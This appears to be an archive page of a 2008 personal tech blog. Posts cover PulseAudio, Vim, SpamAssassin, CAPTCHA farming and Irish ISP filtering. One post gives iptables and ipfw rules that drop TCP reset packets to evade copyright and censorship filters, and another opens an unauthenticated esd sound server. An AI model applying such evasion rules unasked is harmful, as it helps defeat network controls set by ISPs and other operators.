Select the "RTP Monitor Stream" in the "Sources" list, and open "Properties":

Hit the "Kill" button, and your network is back to normal. Phew.

Another (quicker) way to do this, is using the command-line "pacmd" tool:

echo kill-source-output 0 | pacmd

It's a mystery where this is coming from, btw. Here's what "paman" says it came from:

But I don't seem to have an active 'module-rtp-send' line in my configuration:

: jm 98...; grep module-rtp-send /etc/pulse/* /home/jm/.pulse*
/etc/pulse/default.pa:#load-module module-rtp-send source=rtp.monitor

Curious. And irritating.

Update: it turns out there's another source of configuration -- GConf. "paprefs" can be used to examine that, and that's where the setting had been set, undoubtedly by me hacking about at some stage. :(

more crap from St. Petersburg

Published March 19, 2008

Noted with alarm in this comment regarding the horrific privacy-invading adware that is Phorm:

Their programmers are mostly Saint Petersburg-based, home to the Russian Business Network. Their servers are kept only in Saint Petersburg and China, so no ISP customer data is ever stored in the UK. Any personally identifying information they obtain about UK citizens can never be seen or purged using existing UK Data Protection Laws.

St. Petersburg is turning out to be quite a source of online nastiness -- the new Boca Raton.

Evading Audible Magic’s Copysense filtering

Published March 12, 2008

As I noted on Monday, the Irish branches of several major record companies have brought a case against Eircom, demanding in part that the ISP install Audible Magic's Copysense anti-filesharing appliances on their network infrastructure.

I thought I'd do a quick bit of research online into how they do their filtering. Here's what the EFF had to say:

Audible Magic's technology can easily be defeated by using one-time session key encryption (e.g., SSL) or by modifying the behavior of the network stack to ignore RST packets.

It's interesting to see that they used RST packets -- this is the same mechanism used by the "Great Firewall of China" to censor the internet:

the keyword detection is not actually being done in large routers on the borders of the Chinese networks, but in nearby subsidiary machines. When these machines detect the keyword, they do not actually prevent the packet containing the keyword from passing through the main router (this would be horribly complicated to achieve and still allow the router to run at the necessary speed). Instead, these subsiduary machines generate a series of TCP reset packets, which are sent to each end of the connection. When the resets arrive, the end-points assume they are genuine requests from the other end to close the connection — and obey. Hence the censorship occurs.

But there's a very easy way to avoid this, according to that blog post:

However, because the original packets are passed through the firewall unscathed, if both of the endpoints were to completely ignore the firewall’s reset packets, then the connection will proceed unhindered! We’ve done some real experiments on this — and it works just fine!! Think of it as the Harry Potter approach to the Great Firewall — just shut your eyes and walk onto Platform 9¾.

Clayton, Murdoch, and Watson's paper on this technique provides the Linux and FreeBSD firewall commands they used to do this. Here's Linux:

   iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP

For FreeBSD, the command is:

   ipfw add 1000 drop tcp from any to me tcpflags rst in

So assuming Copysense haven't changed their approach yet, it's trivial to block Copysense's filtering, if both ends are running Linux or BSD. I predict if Copysense becomes widespread, someone will patch Windows TCP to do the same.

I love Audible Magic's response:

The current appliance happens to use the TCP Reset to accomplish this today. There are many other technical methods of blocking transfers. Again, we have strategies to deal with them should they ever prove necessary. This is why we recommend our customers purchase a software support agreement which provides for these enhancements that keep their purchase up-to-date and protect their investment.

in other words, "hey customers! if you don't have a support contract, you're shit out of luck when the p2p guys get around our filters!" Nice. ;)

Vim hanging while running VMWare: fixed

Published March 12, 2008

I've just fixed a bug on my linux desktop which had been annoying me for a while. Since there seems to be little online written about it, here's a blog post to help future Googlers.

Here's the symptoms: while you're running VMWare, your Vim editing sessions freeze up for 20 seconds or so, roughly every 5 minutes. The editor is entirely hung.

If you strace -p the process ID before the hang occurs, you'll see something like this:

select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
_llseek(7, 4096, [4096], SEEK_SET)      = 0
write(7, "tp\21\0\377\0\0\0\2\0\0\0|\0\0\0\1\0\0\0\1\0\0\0\6\0\0"..., 4096) = 4096
ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost -isig -icanon -echo ...}) = 0
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
_llseek(7, 20480, [20480], SEEK_SET)    = 0
write(7, "ad\0\0\245\4\0\0\341\5\0\0\0\20\0\0J\0\0\0\250\17\0\0\247"..., 4096) = 4096
ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost -isig -icanon -echo ...}) = 0
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
fsync(

In other words, the hung process is sitting in an fsync() call, attempting to flush changed data for the current file to disk.

Investigation threw up the following: a kerneltrap thread about disk activity, poor responsiveness with Firefox 3.0b3 on linux, and a VIM bug report regarding this feature interfering with laptop-mode and spun-down hard disks.

VMWare must be issuing lots of unsynced I/O, so when Vim issues its fsync() or sync() call, it needs to wait for the VMWare I/O to complete before it can return -- even though the machine is otherwise idle. A bit of a Linux kernel (or specifically, ext3) misfeature, it seems.

Synthesising details from those threads comes up with this fix: edit your ~/.vimrc and add the following lines --

set swapsync=
set nofsync

This will inhibit use of both fsync() and sync() by Vim, and the problem is avoided nicely.

Update: one of the Firefox developers discusses how this affects FF 3.0.

Irish ISPs in record company crosshairs

Published March 11, 2008

RTE reports that 4 record companies, EMI, Sony BMG, Universal Music and Warner Music, have brought a High Court action to compel Eircom -- Ireland's largest ISP -- to prevent its networks being used for the illegal downloading of music:

Willie Kavanagh, Managing Director of EMI Ireland and chairman of IRMA, said because of illegal downloading and other factors, the Irish music industry was experiencing a "dramatic and accelerating decline" in income. He said sales in the Irish market dropped 30% in the six years up to 2007.

EMI and the other companies are challenging Eircom's refusal to use filtering technology or other measures to voluntarily block or filter illegally downloaded material. Last October Eircom told the companies it was not in a position to use the filtering software.

(I wonder if those dropping sales in the Irish market comprise only CDs sold by Irish shops? 2001 to 2007 is also the time period when physical sales have given way to online shopping on a gigantic scale, especially for music.)

The Irish Times coverage includes another interesting factoid, which appears in a lot of press regarding this case:

Latest figures available, for 2006, indicate that 20 billion music files were illegally downloaded worldwide that year. The music industry estimates that for every single legal download, there are 20 illegal ones.

A little research reveals that that figure comes from the IFPI Digital Music Report 2008. I'd have a totally different take on it, however. In my opinion, the figure is probably correct, but not for the reasons the IFPI want them to be. There are a number of factors:

There's more commentary on the 20-to-1 figure here.

The IFPI Digital Music Report 2008 also notes:

“2007 was the year ISP responsibility started to become an accepted principle. 2008 must be the year it becomes reality”

Governments are starting to accept that Internet Service Providers (ISPs) should take a far bigger role in protecting music on the internet, but urgent action is needed to translate this into reality, a new report from the international music industry says today.

ISP cooperation, via systematic disconnection of infringers and the use of filtering technologies, is the most effective way copyright theft can be controlled. Independent estimates say up to 80 per cent of ISP traffic comprises distribution of copyright-infringing files.

The IFPI Digital Music Report 2008 points to French President Sarkozy’s November 2007 plan for ISP cooperation in fighting piracy as a groundbreaking example internationally. Momentum is also gathering in the UK, Sweden and Belgium. The report calls for legislative action by the European Union and other governments where existing discussions between the music industry and record companies fail to progress.

So it seems Ireland is the vanguard of an international effort by IFPI members to force ISPs to install filtering, worldwide. It seems the same happened in Belgium last year -- and I reckon there'll be similar cases elsewhere soon.

Either way, I doubt this will be good for Irish internet users.

(PS: while I'm talking about buying MP3s online -- a quick plug for 7digital. Last time I used them, I had a pretty crappy experience, but the situation is a lot better nowadays. They now have a great website that works perfectly in Firefox on Linux; they sell brand new releases like the Hercules and Love Affair album as 320kbps DRM-free MP3s; they support PayPal payments; and downloads are fast and simple -- right click, "Save As". hooray!)

Some other blog coverage: Lex Ferenda with some details about the legal situation, and Jim Carroll.

Update: EMI Ireland seem to be singing from a different hymn-sheet than their head office... interesting.

Update 2: I've taken a look at the Copysense filtering technology, and how it can be evaded.

Announcing IrishPulse

Published March 6, 2008

As I previously threatened, I've gone ahead and created a "Microplanet" for Irish twitterers, similar to Portland's Pulse of PDX -- an aggregator of the "stream of consciousness" that comes out of our local Twitter community: IrishPulse.

Here's what you can do:

Add yourself: if you're an Irish Twitter user, follow the user 'irishpulse'. This will add you to the sources list.

Publicise it: feel free to pass on the URL to other Irish Twitter users, and blog about it.

Read it: bookmark and take a look now and again!

In terms of implementation, it's just a (slightly patched) copy of Venus and a perl script using Net::Twitter to generate an OPML file of the Twitter followers. Here's the source. I'd love to see more "Pulse" sites using this...

Google’s CAPTCHA – not entirely broken after all?

Published March 5, 2008

A couple of weeks ago, WebSense posted this article with details of a spammer's attack on Google's CAPTCHA puzzle, using web services running on two centralized servers:

[...] It is observed that two separate hosts active on same domain are contacted during the entire process. These two hosts work collaboratively during the CAPTCHA break process. [...]

Why [use 2 hosts]? Because of variations included in the Google CAPTCHA image, chances are that host 1 may fail breaking the code. Hence, the spammers have a backup or second CAPTCHA-learning host 2 that tries to learn and break the CAPTCHA code. However, it is possible that spammers also use these two hosts to check the efficiency and accuracy of both hosts involved in breaking one CAPTCHA code at a time, with the ultimate goal of having a successful CAPTCHA breaking process.

To be specific, host 1 has a similar concept that was used to attack Live mail CAPTCHA. This involved extracting an image from a victim’s machine in the form of a bitmap file, bearing BM.. file headers and breaking the code. Host 2 uses an entirely different concept wherein the CAPTCHA image is broken into segments and then sent as a portable image / graphic file bearing PV..X file headers as requests. [...]

While it doesn't say as such, some have read the post to mean that Google's CAPTCHA has been solved algorithmically. I'm pretty sure this isn't the case. Here's why.

Firstly, the FAQ text that appears on "host 1" (thanks Alex for the improved translation!):

img

FAQ

If you cannot recognize the image or if it doesn’t load (a black or empty image gets displayed), just press Enter.

Whatever happens, do not enter random characters!!!

If there is a delay in loading images, exit from your account, refresh the page, and log in again.

The system was tested in the following browsers: Internet Explorer Mozilla Firefox

Before each payment, recognized images are checked by the admin. We pay only for correctly recognized images!!!

Payment is made once per 24 hours. The minimum payment amount is $3. To request payment, send your request to the admin by ICQ. If the admin is free, your request will be processed within 10-15 minutes, and if he is busy, it will be processed as soon as possible.

If you have any problems (questions), ICQ the admin.

That reads to me a lot like instructions to human "CAPTCHA farmers", working as a distributed team via a web interface.

Secondly, take a look at the timestamps in this packet trace:

img2

The interesting point is that there's a 40-second gap between the invocation on "Captcha breaking host 1" and the invocation on "Captcha breaking host 2". There is then a short gap of 5 seconds before the invocations occur on the Gmail websites.

Here's my theory: "host 1" is a web service gateway, proxying for a farm of human CAPTCHA solvers. "host 2", however, is an algorithm-driven server, with no humans involved. A human may take 40 seconds to solve a CAPTCHA, but pure code should be a lot speedier.

Interesting to note that they're running both systems in parallel, on the same data. By doing this, the attackers can

  1. collect training data for a machine-learning algorithm (this is implied by the 'do not enter random characters!' warning from the FAQ -- they don't want useless training data)

  2. collect test cases for test-driven development of improvements to the algorithm

  3. measure success/failure rates of their algorithms, "live", as the attack progresses

Worth noting this, too:

Observation*: On average, only 1 in every 5 CAPTCHA breaking requests are successfully including both algorithms used by the bot, approximating a success rate of 20%. The second algorithm (segmentation) has very poor performance that sometimes totally fails and returns garbage or incorrect answers.

So their algorithm is unreliable, and hasn't yet caught up with the human farmers. Good news for Google -- and for the CAPTCHA farmers of Romania ;)

Update: here's the NYTimes' take, with broadly agreeing comments from Brad Taylor of Google. (The Register coverage is off-base, however.)

On the effects of lowering your SpamAssassin threshold

Published February 29, 2008

So I was chatting to Danny O'Brien a few days ago. He noted that he'd reduced his Spamassassin "this is spam" threshold from the default 5.0 points to 3.7, and was wondering what that meant:

I know what it means in raw technical terms -- spamassassin now marks anything >3.7 as spam, as opposed to the default of five. But given the genetic algorithm way that SA calculates the rule scoring, what does lowering the score mean? That I'm more confident that stuff marked ham is stuffed marked ham than the average person? That my bayesian scoring is now really good?

Do people usually do this without harmful side-effects? What does it mean about them if they do it?

Does it make me a good person? Will I smell of ham? These are the things that keep me awake at night.

It's a good question! Here's what I responded with -- it occurs to me that this is probably quite widely speculated about, so let's blog it here, too.

As you tweak the threshold, it gets more or less aggressive.

By default, we target a false positive rate of less than 0.1% -- that means 1 FP, a ham marked as spam incorrectly, per 1000 ham messages. Last time the scores were generated, we ran our usual accuracy estimation tests, and got a false positive rate of 0.06% (1 in 1667 hams) and a false negative rate of 1.49% (1 in 67 spams) for the default threshold of 5.0 points. That's assuming you're using network tests (you should be) and have Bayes training (this is generally the case after running for a few weeks with autolearning on).

If you lower the threshold, then, that trades off the false negatives (reducing them -- less spam getting past) in exchange for more false positives (hams getting caught). In those tests, here's some figures for other thresholds:

SUMMARY for threshold 3.0: False positives: 290 0.43% False negatives: 313 0.26%

SUMMARY for threshold 4.0: False positives: 104 0.15% False negatives: 1084 0.91%

SUMMARY for threshold 4.5: False positives: 68 0.10% False negatives: 1345 1.13%

so you can see FPs rise quite quickly as the threshold drops. At 4.0 points, the nearest to 3.7, 1 in 666 ham messages (0.15%) will be marked incorrectly as spam. That's nearly 3 times as many FPs as the default setting's value (0.06%). On the other hand, only 1 in 109 spams will be mis-filed.

Here's the reports from the last release, with all those figures for different thresholds -- should be useful for figuring out the likelihoods!

In fact, let's get some graphs from that report. Here is a graph of false positives (in orange) vs false negatives (in blue) as the threshold changes...

and, to illustrate the details a little better, zoom in to the area between 0% and 1%...

You can see that the default threshold of 5.0 isn't where the FP% and FN% rates meet; instead, it's got a much lower FP% rate than FN%. This is because we consider FPs to be much more dangerous than missed spams, so we try to avoid them to a higher degree.

An alternative, more standardized way to display this info is as a Receiver Operating Characteristic curve, which is basically a plot of the true positive rate vs false positives, on a scale from 0 to 1.

Here's the SpamAssassin ROC curve:

More usefully, here's the ROC curve zoomed in nearer the "perfect accuracy" top-left corner:

Unfortunately, this type of graph isn't much use for picking a SpamAssassin threshold. GNUplot doesn't allow individual points to be marked with the value from a certain column, otherwise this would be much more useful, since we'd be able to tell which threshold value corresponds to each point. C'est la vie!

Update:: this is possible with GNUplot 4.2 onwards, it seems. great news! Hat tip to Philipp K Janert for the advice. here are updated graphs using this feature:

(GNUplot commands to render these graphs are here.)

Update again: much better interactive Flash graphs here.

Microplanets

Published February 26, 2008

Intriguing! Via Glynn Moody comes an interesting new site, Pulse of Open Source:

To highlight open source activity on Twitter, I have launched a new web application today called The Pulse of Open Source. This is the stream of collective consciousness from the open source community on Twitter. You can follow this stream by simply bookmarking the site and visiting regularly or by adding the RSS feed to your feed reader. You can also create a Twitter account and add the individuals you’d like to follow to your own Twitter friends list if you’d prefer. There is also a mobile version of the site for on-the-go viewing.

I'm not entirely convinced it makes sense -- the "open source community" is a pretty wide and amorphous concept, covering "enterprisey" types like Iona, to conference organisers, to web standards guys to GNOME developers. That's a wide range.

However, that site links to the original, and a version which resonates better: PulseOfPDX.com, 'the stream of Portland's collective consciousness'. Basically, this is a local syndication site, with microblogging from a community of local Twitterers. Similar to the "Planet" concept, which aggregates posts from multiple weblogs into a new 'river of news' combined feed, as seen on Planet Antispam, Planet Perl, Planet.journals.ie, but for off-the-cuff Twitter microblog comments. It's a microplanet, to coin a phrase.

I think I might set up one of these for Ireland... what a great idea!

Update: Ted Leung posted about this today as well, I see, linking to this call for an "out-of-the-box" Twitter aggregator:

In theory, this whole pulse idea could be packaged up to be as easily deployable as “planet” sites. Here, “pulse” is the operational brand-name of aggregating Twitter accounts, where as “planet” is the tried and true operational brand-name of aggregating blogs.

I think I still prefer "microplanet" ;)

Update 2: check out IrishPulse!

Bea picture of the week

Published February 25, 2008

Another super-cute photo of Bea, from the latest batch. Nowadays, my photos are all-Bea, all of the time...


Plug plug

Published February 22, 2008

It's been a while since I've posted about good shopping experiences I've had. Here's a couple:

SoleTrader.co.uk: I'm a terrible shopper. I hate shops, I always wind up having to visit them at their busiest times on the weekend, and the last time I tried to go shopping for a new pair of shoes, I got caught in torrential rain, fell over and broke my thumb instead. seriously. So feck that.

Instead, I resolved to buy them online, and that I did -- from SoleTrader. They had a great range of trainers, I found what I was after, the price was grand, and delivery on time. Shoes are always the same size -- their sizes are standardised, after all -- so naturally they fit fine. All in all, it worked out great.

Be Organic: these guys operate in North Dublin, delivering bags of organic fruit and vegetables to your door, weekly. We get the Essential Fruit Bag and the Mini Box, with a bi-weekly bag of spuds on top, for EUR 32 per week. The quality of the food is absolutely fantastic, there's never any spoilage or wilting, and it's always fresh and delicious. Compared to supermarket fare, it's leagues ahead. They've also been grand and flexible when we need to tweak the order slightly -- for example we have a veto on celery, and that's not an issue at all. The only problem would be that they've recently increased their prices... but unfortunately that seems to be a general problem in Ireland these days!

vote for Dustin on Saturday

Published February 20, 2008

A friend of a friend writes:

Unless you are pretty good at avoiding the media, you will be aware that Dustin the Turkey has been chosen as one of six finalists for RTE's Eurosong, the winner of which will go on to represent Ireland in the Eurovision Song Contest in Serbia in May.

What you may not be aware of is that I wrote and recorded the song with him and need your votes to help get me to Serbia!!!

The TV show will be broadcast live on RTE this Saturday Feb 23rd, at 7pm. It is a televote (a la X-factor format), so get your mobile phones ready. The results are at 9:45pm.

The song, Irlande Douze Points, is a parody on the current types of songs, acts and block-voting in the Eurovision. It may make your ears bleed a bit, you may ask yourself why, but what the hell, send someone you know to the final!!!

Apparently, Dustin urges the contest judges to "give douze points to Ireland, for its lowlands and its highlands, for Terry Wogan's wig and Bono's leather pants. We brought you Guinness and Westlife, 800-years of war and strife, but we all apologise for Riverdance."

Check out the outraged reactions from Ireland's past Eurovision "winners":

Frank McNamara, who wrote two of the Irish Eurovision winners, asked whether RTE, the state broadcaster that selected the six acts, was “giving two fingers” to Irish 'song'writers. “I think it is absolutely disgraceful."

Shay Healy, who wrote Johnny Logan’s Eurovision hit What’s Another Year?, wondered “how any bunch of grown-ups could come up with this as a solution”

Phil Coulter thought that Eurovision was going “down the tubes”.

The choice on Saturday is between a turkey puppet taking the piss in a Northside accent, and such po-faced "serious pop" mawkfests as '"Double Cross My Heart" performed by Donal Skehan' and '"Time to Rise" performed by Maya'. snore. You know it's got to be the turkey.

Here's the official Bebo page, and the Facebook group -- and here's the song itself:

Update: actually, here's another, higher quality clip -- with an entirely different song! Let's hope this is the one...

Update 2: he won. Dana and the other professional Eurovision types have been chewing wasps, it's hilarious!

A historical DailyWTF moment

Published February 14, 2008

Today, in work, we wound up discussing this classic DailyWTF.com article -- "Remember, the enterprisocity of an application is directly proportionate to the number of constants defined":

public class SqlWords
{
  public const string SELECT = " SELECT ";
  public const string TOP = " TOP ";
  public const string DISTINCT = " DISTINCT ";
  /* etc. */
}

public class SqlQueries
{
  public const string SELECT_ACTIVE_PRODCUTS =
    SqlWords.SELECT +
    SqlWords.STAR +
    SqlWords.FROM +
    SqlTables.PRODUCTS +
    SqlWords.WHERE +
    SqlColumns.PRODUCTS_ISACTIVE +
    SqlWords.EQUALS +
    SqlMisc.NUMBERS_ONE;
  /* etc. */
}

This made me recall the legendary source code for the original Bourne shell, in Version 7 Unix. As this article notes:

Steve Bourne, at Bell Labs, worked on his version of shell starting from 1974 and this shell was released in 1978 as Bourne shell. Steve previously was involved with the development of Algol-68 compiler and he transferred general approach and some syntax sugar to his new project.

"Some syntax sugar" is an understatement. Here's an example, from cmd.c:

LOCAL REGPTR    syncase(esym)
        REG INT esym;
{
        skipnl();
        IF wdval==esym
        THEN    return(0);
        ELSE    REG REGPTR      r=getstak(REGTYPE);
                r->regptr=0;
                LOOP wdarg->argnxt=r->regptr;
                     r->regptr=wdarg;
                     IF wdval ORF ( word()!=')' ANDF wdval!='|' )
                     THEN synbad();
                     FI
                     IF wdval=='|'
                     THEN word();
                     ELSE break;
                     FI
                POOL
                r->regcom=cmd(0,NLFLG|MTFLG);
                IF wdval==ECSYM
                THEN    r->regnxt=syncase(esym);
                ELSE    chksym(esym);
                        r->regnxt=0;
                FI
                return(r);
        FI
}

Here are the #define macros Bourne used to "Algolify" the C compiler, in mac.h:

/*
 *      UNIX shell
 *
 *      S. R. Bourne
 *      Bell Telephone Laboratories
 *
 */

#define LOCAL   static
#define PROC    extern
#define TYPE    typedef
#define STRUCT  TYPE struct
#define UNION   TYPE union
#define REG     register

#define IF      if(
#define THEN    ){
#define ELSE    } else {
#define ELIF    } else if (
#define FI      ;}

#define BEGIN   {
#define END     }
#define SWITCH  switch(
#define IN      ){
#define ENDSW   }
#define FOR     for(
#define WHILE   while(
#define DO      ){
#define OD      ;}
#define REP     do{
#define PER     }while(
#define DONE    );
#define LOOP    for(;;){
#define POOL    }


#define SKIP    ;
#define DIV     /
#define REM     %
#define NEQ     ^
#define ANDF    &&
#define ORF     ||

#define TRUE    (-1)
#define FALSE   0
#define LOBYTE  0377
#define STRIP   0177
#define QUOTE   0200

#define EOF     0
#define NL      '\n'
#define SP      ' '
#define LQ      '`'
#define RQ      '\''
#define MINUS   '-'
#define COLON   ':'

#define MAX(a,b)        ((a)>(b)?(a):(b))

Having said all that, the Bourne shell was an awesome achievement; many of the coding constructs we still use in modern Bash scripts, 30 years later, are identical to the original design.

Technorati bloginfo API wierdness

Published February 13, 2008

For the benefit of other Technorati API users...

In a comment on this entry, Padraig Brady mentioned that his blog had mysteriously disappeared from the Irish Blogs Top 100 list.

I investigated, and found something odd -- it seems Technorati has made a change to their bloginfo API, now listing weblogs with their 'rank', but without some of the important metadata, like 'inboundblogs', 'inboundlinks', and with a 'lastupdate' time set to the epoch (1970-01-01 00:00:00 GMT), in the API. Here's an example:

<!-- generator="Technorati API version 1.0" -->
<!DOCTYPE tapi PUBLIC "-//Technorati, Inc.//DTD TAPI 0.02//EN"
                 "http://api.technorati.com/dtd/tapi-002.xml">
<tapi version="1.0">
<document>
    <result>
        <url>http://www.pixelbeat.org</url>
                    <weblog>
                <name>Pádraig Brady</name>
                <url>http://www.pixelbeat.org</url>
                <rssurl></rssurl>
                <atomurl></atomurl>
                <inboundblogs></inboundblogs>
                <inboundlinks></inboundlinks>
                <lastupdate>1970-01-01 00:00:00 GMT</lastupdate>
                <rank>74830</rank>
            </weblog>
                            </result>
</document>
</tapi>

Compare that with this lookup result, on my own blog:

<?xml version="1.0" encoding="utf-8"?>
<!-- generator="Technorati API version 1.0" -->
<!DOCTYPE tapi PUBLIC "-//Technorati, Inc.//DTD TAPI 0.02//EN"
                 "http://api.technorati.com/dtd/tapi-002.xml">
<tapi version="1.0">
<document>
    <result>
        <url>http://taint.org</url>
                    <weblog>
                <name>taint.org: Justin Mason’s Weblog</name>
                <url>http://taint.org</url>
                <rssurl>http://taint.org/feed</rssurl>
                <atomurl>http://taint.org/feed/atom</atomurl>
                <inboundblogs>143</inboundblogs>
                <inboundlinks>227</inboundlinks>
                <lastupdate>2008-02-12 11:48:10 GMT</lastupdate>
                <rank>43404</rank>
            </weblog>
                            <inboundblogs>143</inboundblogs>
                            <inboundlinks>227</inboundlinks>
            </result>
</document>
</tapi>

This bug had caused a number of blogs to be dropped from the list, since I was using "inboundblogs and inboundlinks == 0" as an indication that a blog was not registered with Technorati.

It's now worked around in my code, although a side-effect is that blogs which have this set will appear with question-marks in the 'inboundblogs' and 'inboundlinks' columns, and will perform poorly in the 'ranked by inbound link count' table (unsurprisingly).

I've posted a query to the support forum -- let's see what the story is.

Interesting Irish Blog Awards shortlistee

Published February 12, 2008

This year's Irish Blog Awards shortlists were posted yesterday. I maintain the Irish Blogs Technorati Top 100 list, so good sources of Irish blog URLs are always welcome; I took the shortlisted blogs and added them all.

Interestingly, straight in at number 2 went towleroad.com (warning: not worksafe!). It has a staggering Technorati rank of 1074 -- way ahead of Donncha's 5831 or Mulley's 8678. I was pretty curious as to how an Irish blog could hit those heights without me having heard of it, so I took a look.

Let's just say the content isn't quite what you'd expect to find in a blog shortlisted for 'Best News/Current Affairs Blog' -- a little bit short on Irish news, but heavy on pictures of naked guys getting off with each other. ;)

I took a quick glance, and I couldn't spot any Irish content. WHOIS says the the publisher is LA-based. so I'm curious as to what qualified it as an "Irish blog"...

(by the way, I tried to leave a comment on the blog entry, but it appears Akismet is marking my comments as spam on a number of Wordpress-based blogs at the moment. Yes, I am aware of the irony. No, if SpamAssassin was a blog-spam filter, it wouldn't do that ;)

Update: it's sorted -- they're now gone. Also, it appears I've been removed from the Akismet blacklist, yay.

More on the Trend Micro patent

Published February 12, 2008

Dutch free knowledge and culture advocacy group ScriptumLibre.org has called for a worldwide boycott of Trend Micro products. Their chairman, Wiebe van der Worp, claims Trend Micro's aggressive use of litigation is "well beyond the borders of decency".

Also, this Linux.com feature has a great quote from Jim Zemlin, the executive director of the Linux Foundation:

"A company that files a patent claim against code coming from a widely adopted open source project vastly underestimates the self-inflicted damage to its customer and community relationships. In today's world, all of our customers in the software industry are enjoying the benefits of a wide variety of open source projects that provide stability and vendor-neutral solutions to the most basic of their computing needs. I talk to those customers every day. They consider these claims short-sighted and those that assert them to be fearful of their ability to compete in today's economy."

Well said.

Plug: Lenovo service still rocks

Published February 8, 2008

I needed to buy a new laptop for work a few months back, and after a little agonizing between the MacBook Pro and a Thinkpad T61p, I plumped for the latter. As I noted at the time, one of the major selling points was the quality of IBM/Lenovo's after-sales warranty service, compared to the atrocious stories I'd heard about AppleCare in Europe. I was, however, taking a leap of faith -- I had used IBM service to great effect in the US, but had never actually tried it out in Ireland.

Sadly, I had to put this to the test today, after the hard disk started producing these warnings:

/var/log/messages:Feb  7 11:21:13 wall kernel: 
[2075890.116000] end_request: I/O error, dev sda, sector 116189461
/var/log/messages:Feb  7 11:21:38 wall kernel: 
[2075914.824000] end_request: I/O error, dev sda, sector 116189460
/var/log/messages:Feb  7 11:24:18 wall kernel: 
[2076075.072000] end_request: I/O error, dev sda, sector 116189462
/var/log/messages:Feb  7 11:25:05 wall kernel: 
[2076121.932000] end_request: I/O error, dev sda, sector 116189463

It's a brand new machine, and a Hitachi TravelStar 7K100 drive, with a good reputation for reliability -- but these things do happen. :(

Interestingly, I thought this was a case of the Bathtub curve in action -- but this comprehensive CMU study of hard drive reliability notes that the 'infant mortality' concept doesn't seem to apply to current hard-drive technology:

Replacement rates [of hard drives in a cluster] are rising significantly over the years, even during early years in the lifecycle. Replacement rates in HPC1 nearly double from year 1 to 2, or from year 2 to 3. This ob- servation suggests that wear-out may start much earlier than expected, leading to steadily increasing replacement rates during most of a system’s useful life. This is an in- teresting observation because it does not agree with the common assumption that after the first year of operation, failure rates reach a steady state for a few years, forming the “bottom of the bathtub”.

Anyway, I digress.

I ran the BIOS hard disk self-test, got the expected failure, then rang up Lenovo's International Warranty line for Ireland. I got through immediately to a helpful guy in India, and gave him my details and the BIOS error message; he had no tricky questions, no guff about me using Linux rather than Windows, and there were no attempts to sting me for shipping.

There's now a replacement HD (and a set of spare recovery disks, bonus!) winging their way via 2-day shipping, expected on Tuesday; I'm to hand over the broken HD to the courier once it arrives. Fantastic stuff!

Assuming the courier doesn't screw up, this is yet another major win for IBM/Lenovo support, and I feel vindicated. ;)

Update: the HD arrived this morning at 10am -- a day early. Very impressive!

CEAS needs your ham

Published February 5, 2008

CEAS 2008 is doing another Spam Challenge test of various spam-filters, and as part of this, they need samples of ham mail messages.

As part of the data collection effort, we have set up a website through which it is possible to donate non-sensitive legitimate email, to be used in the evaluation. Any kind of email that the recipient considers legitimate is welcome, including computer generated (non-spam) messages.

After the CEAS evaluation, the benchmark data will be made publicly available to facilitate future reasearch and development in the field of spam prevention.

Here is the collection site; they accept UNIX mbox format, and tar.gz or zip files of same, with an 8MB upload limit.

Remote sound playback through a Nokia 770

Published February 3, 2008

For a while now, I've been using various hacks to play music from my Linux laptop, holding my main music collection, to client systems which drive the speakers.

Previously, I used this setup to play via my MythTV box. Nowadays, however, my TV isn't in the room where I want to listen to music. Instead, I have my Nokia 770 hooked up to the speakers; this plays the BBC Radio 4 RealAudio streams nicely, and also the laptop's MP3 collection using a uPnP AV MediaServer.

I specifically use TwonkyMedia right now, playing back via the N770's Media Streamer app. (That works pretty well -- uPnP AV is one of those standards plagued with incompatibilities, but TwonkyMedia and Media Streamer seem to be a reliable combination.)

However, TwonkyMedia sometimes fails to notice updates of the library, and nothing has quite as good a music-player user interface as JuK, the KDE music player and organiser app, so a way to play directly from the laptop instead of via uPnP would be nice...

A weekend's hacking reveals that this is pretty easily done nowadays, thanks to some cool features in pulseaudio, the current standard sound server on Ubuntu gutsy, and the Esound server running on the N770.

Unfortunately, the N770 doesn't (yet) support pulseaudio directly, otherwise we could use its seriously cool support for RTP multicast streams. Still, we can hack something up using the venerable "esd" protocol (again!) Here's how to set it up...

On the N770:

You need to fix the N770's "esd" sound server to allow public connections. Set up your wifi network's DHCP server to give the N770 a static IP address. Log in over SSH, or fire up an xterm. Run the following:

mv /usr/bin/esd /usr/bin/esd.real

cat > /usr/bin/esd <<EOM
#!/bin/sh
exec /usr/bin/esd.real -tcp -public -promiscuous -port 5678 $*
EOM

chmod 755 /usr/bin/esd
/etc/init.d/esd restart

On the server:

Download this file, and save it as n770.pa. Edit it, and change server=n770:5678 on the fourth line to use the IP address or hostname of your Nokia 770 instead of n770. Then run:

cp n770.pa ~/.n770.pa

cat > ~/bin/sound_n770 <<EOM
#!/bin/sh
pulseaudio -k; pulseaudio -nF $HOME/.n770.pa &
EOM

cat > ~/bin/sound_here <<EOM
#!/bin/sh
pulseaudio -k; pulseaudio &
EOM

chmod 755 ~/bin/sound_here ~/bin/sound_n770

Now you just need to run '~/bin/sound_n770' to redirect sound playback to the N770, and '~/bin/sound_here' to reset back to laptop speaker output, for the entire desktop environment. Nifty!

Update: it appears that things may work more reliably if you add "rate=22050" at the end of the "load-module module-esound-sink" line -- this halves the bitrate of the network stream, which copes better with harsh wifi network conditions. The n770.pa file above now includes this.

Irish crumblies don’t trust blogs

Published January 31, 2008

It appears a public relations firm, Edelman's, recently performed a phone survey which concluded that bloggers are the "least trusted" group of authority figures source of information in Ireland. This has been widely reported:

on Edelman Dublin's blog:

When we consider who we trust the most as a spokesperson in Ireland, the most trusted sources of information include, financial or industry analysts at 62%, followed by a doctor or healthcare specialist at 57%, an NGO representative at 57% and academics at 53%. Bloggers are the least trusted at 7%.

at Silicon Republic:

Bloggers have emerged as the “least trusted” group in the country.

and on ElectricNews.net:

